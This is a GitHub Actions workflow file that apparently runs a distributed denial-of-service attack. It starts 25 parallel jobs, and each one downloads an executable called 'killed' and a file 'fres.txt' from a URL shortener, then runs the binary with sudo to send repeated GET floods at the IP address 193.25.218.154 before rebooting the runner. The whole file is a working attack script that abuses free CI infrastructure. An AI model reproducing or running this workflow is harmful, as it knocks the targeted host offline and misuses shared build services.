name: Ubuntu VDS 45 saniye kiled

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25] 


    steps:
      - name: OK !
        run: |
          wget https://curl.by/R3dGZ/killed
          wget https://curl.by/cBwSY/fres.txt
          chmod +x killed
          PIDS=()
          for i in {1..2}; do
            sudo timeout 85 ./killed GET http://193.25.218.154/ fres.txt 80 900 8 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 85
        
      - name: OK !
        run: sudo reboot
